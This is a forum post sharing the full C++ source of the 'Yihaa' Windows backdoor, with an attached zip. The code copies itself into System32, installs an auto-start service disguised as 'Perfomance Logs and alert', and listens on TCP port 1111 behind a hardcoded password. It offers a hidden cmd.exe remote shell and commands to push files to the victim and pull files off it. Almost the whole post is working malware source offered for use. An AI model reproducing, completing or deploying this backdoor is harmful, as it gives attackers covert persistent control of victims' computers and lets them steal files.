Yihaa_v01 Source Code

// yihaa_upload.cpp : Defines the entry point for the console application.
//
//1. Service and Socket Code from http://www.msdn.micr...ary/default.asp
//2. CreatePipe and PeekNamedPipe read from Ipxodi code (thank's for your tutor Ipxodi)
//
//hei, i am new in VC++
//so, sorry if this code is very kiddie's ......
//
//This Yihaa Backdoor will Create Service name "Spoolsw", with Service dispalyname "Perfomance Logs And alert"
//And Copy it's self to "%SystemRoot%\System32\Spoolsw.exe"
//use socket, not WSASocket..........
//remove this backdoor :
//Delete HKLM>HARDWARE>SYSTEM>controlset001>service>spoolsw
//than restart your compie
//(don't forget del "%SystemRoot%\system32\spoolsw.exe")
//

#include "stdafx.h"
#include <winsock2.h>
#include <stdio.h>
#include <string.h>
#include <io.h>
#include <sys/stat.h>
#include <fcntl.h>

#pragma comment (lib, "Ws2_32.lib")
char *passsalah ="\nPASSWORD SALAH..!!\n";
char *passoke ="\nOKE, PASSWORD BENAR, SILAHKAN MASUK..!!\n";
char *selamat ="\n===================================***--***===================================\n"
"= YIHAA BACKDOOR =\n"
"= ===***__***=== =\n"
"= COPYRIGHT 2004 BY BLAHPLOK =\n"
"===========================================================================
===\n";
char namaservice[]="Spoolsw";
char namaservicedisply[]="Perfomance Logs and alert";

#define PASS "4204"
#define CELL "cell"
#define KIRIM "kirim"
#define TERIMA "terima"

void WINAPI penghandle(DWORD);
void WINAPI servicemain(DWORD,LPTSTR*);

int main(int argc, char* argv[])
{
SC_HANDLE sch1, sch2;
char namapath[]="%SystemRoot%\\System32\\Spoolsw.exe";
char sysdir[MAX_PATH];
char filename[256];
HMODULE gmh;

GetSystemDirectory(sysdir,sizeof(sysdir));
gmh=GetModuleHandle(NULL);
GetModuleFileName(gmh,filename,sizeof(filename));

strcat(sysdir,"\\Spoolsw.exe");
CopyFile(filename,sysdir,0);

SERVICE_TABLE_ENTRY ste[]=
{
{namaservice,servicemain},{NULL,NULL}
};

sch1=OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
sch2=OpenService(sch1,namaservice,SERVICE_START);
if(sch2)
{
CloseServiceHandle(sch2);
}
else
{
if(GetLastError()==ERROR_SERVICE_DOES_NOT_EXIST)
{
sch2=CreateService(sch1,namaservice,namaservicedisply,SERVICE_ALL_ACCESS,SERVICE
_WIN32_OWN_PROCESS,SERVICE_AUTO_START,SERVICE_ERROR_NORMAL,namapath,NULL,NULL,NU
L
L,NULL,NULL);
if (sch2 !=NULL)
{
StartService(sch2,0,NULL);
CloseServiceHandle(sch1);
CloseServiceHandle(sch2);
return 0;
}
}
}
if(!StartServiceCtrlDispatcher(ste))
{
servicemain(0,NULL);
}
return(1);
}

void WINAPI servicemain(DWORD argc, LPTSTR *argv)
{
SERVICE_STATUS_HANDLE sth;
SERVICE_STATUS s_status;
unsigned int panjang;
unsigned int filekirim1;
unsigned int filekirim2;
FILE *terima1;
char *terima2;
char terima3[80];
char *TERIMA4;
int bytedibaca;
FILE *terima;
FILE *hg1;
char *hg2;
char hg3[80];
char *FILE;
char buffer[1024000];
unsigned int files;
unsigned int file;

STARTUPINFO s_info;
SECURITY_ATTRIBUTES s_attrib;
HANDLE baca_std_keluar, tulis_std_keluar, baca_std_masuk, tulis_std_masuk;
unsigned long byteyangdibaca;
int sock1, sock2, ukuran, ret;
struct sockaddr_in alamat;
WSADATA wsdt;

sth=RegisterServiceCtrlHandler(namaservice,penghandle);

memset(&s_status,0,sizeof(s_status));

s_status.dwServiceType=SERVICE_WIN32_OWN_PROCESS;
s_status.dwCurrentState=SERVICE_RUNNING;
s_status.dwControlsAccepted=SERVICE_ACCEPT_SHUTDOWN;
s_status.dwWin32ExitCode=NO_ERROR;

SetServiceStatus(sth,&s_status);

WSAStartup(MAKEWORD(2, 0), &wsdt);

sock1 = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
memset(&alamat, 0, sizeof(alamat));
alamat.sin_family = AF_INET;
alamat.sin_port = htons(1111);
alamat.sin_addr.s_addr=0;

bind(sock1, (struct sockaddr*)&alamat, sizeof(alamat));
if (listen(sock1,5))
{
return;
}
while(1)
{

ukuran = sizeof(alamat);
sock2 = accept(sock1, (struct sockaddr*)&alamat,&ukuran);
if(sock2)
{
recv(sock2,buffer,sizeof(buffer),0);
if(!(strstr(buffer,PASS)))
{
send(sock2,passsalah,strlen(passsalah),0);
closesocket(sock2);
}
else
{
send(sock2,passoke,strlen(passoke),0);
recv(sock2,buffer,sizeof(buffer),0);
if(strstr(buffer,CELL))
{
s_attrib.nLength = sizeof(SECURITY_ATTRIBUTES);
s_attrib.bInheritHandle = TRUE;
s_attrib.lpSecurityDescriptor = NULL;

CreatePipe(&baca_std_keluar,&tulis_std_keluar,&s_attrib,0);
CreatePipe(&baca_std_masuk,&tulis_std_masuk,&s_attrib,0);

GetStartupInfo(&s_info);
s_info.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
s_info.wShowWindow = SW_HIDE;
s_info.hStdOutput = s_info.hStdError = tulis_std_keluar;
s_info.hStdInput = baca_std_masuk;

CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &s_info, (PROCESS_INFORMATION *)&s_info);
while(1)
{
Sleep(100);
ret=PeekNamedPipe(baca_std_keluar,buffer,sizeof(buffer),&byteyangdibaca,0,0);
if(!byteyangdibaca)
{
byteyangdibaca = recv(sock2,buffer,sizeof(buffer),0);
if(byteyangdibaca <= 0) break;
ret = WriteFile(tulis_std_masuk,buffer,byteyangdibaca,&byteyangdibaca,0);
if(byteyangdibaca >= 4 && buffer[0]=='e'&& buffer[1]=='x'&& buffer[2]=='i'&& buffer[3]=='t')
{
closesocket(sock2);
}
if(!ret) break;
}
else
{
ret = ReadFile(baca_std_keluar,buffer,byteyangdibaca,&byteyangdibaca,0);
if(!ret) break;
ret = send(sock2,buffer,byteyangdibaca,0);
if(ret <= 0) break;
}
}
}
if(strstr(buffer,KIRIM))
{
FILE="namafileyangditerima.txt";
file=open(FILE,O_WRONLY|O_CREAT|O_TRUNC|O_BINARY,S_IREAD|S_IWRITE);

files=recv(sock2,buffer,sizeof(buffer),0);
write(file,buffer,files);
close(file);
Sleep(1000);

hg1=fopen("namafileyangditerima.txt","rb");
hg2=fgets(hg3,80,hg1);
strcpy(hg3,hg2);
FILE=hg3;

file=open(FILE,O_WRONLY|O_CREAT|O_TRUNC|O_BINARY,S_IREAD|S_IWRITE);
fclose(hg1);
panjang=1024000;
while(panjang>0)
{
panjang=recv(sock2,buffer,sizeof(buffer),0);
write(file,buffer,panjang);
close(file);
}
}
if(strstr(buffer,TERIMA))
{
recv(sock2,buffer,sizeof(buffer),0);

TERIMA4="namafileyangdikirim.txt";
filekirim1=open(TERIMA4,O_WRONLY|O_CREAT|O_TRUNC|O_BINARY,S_IREAD|S_IWRITE);
filekirim2=recv(sock2,buffer,sizeof(buffer),0);
write(filekirim1,buffer,filekirim2);
close(filekirim1);
Sleep(100);

terima1=fopen("namafileyangdikirim.txt","rb");
terima2=fgets(terima3,80,terima1);
strcpy(terima3,terima2);

TERIMA4=terima3;
terima=fopen(TERIMA4,"r+b");
fclose(terima1);
if(terima)
{
while((bytedibaca=fread(buffer,1,sizeof(buffer),terima))>0)
{
send(sock2,buffer,bytedibaca,0);
}
fclose(terima);
closesocket(sock2);
}
}
else
{
closesocket(sock2);
}

}
}
}
closesocket(sock2);
}

void WINAPI penghandle(DWORD yess)
{
if (yess=SERVICE_CONTROL_SHUTDOWN)
{
ExitProcess(0);
}
}

Attached File(s)

yihaa_v01.zip (66.09K)
Number of downloads: 286

Forums: Yihaa_v01 Source Code - Forums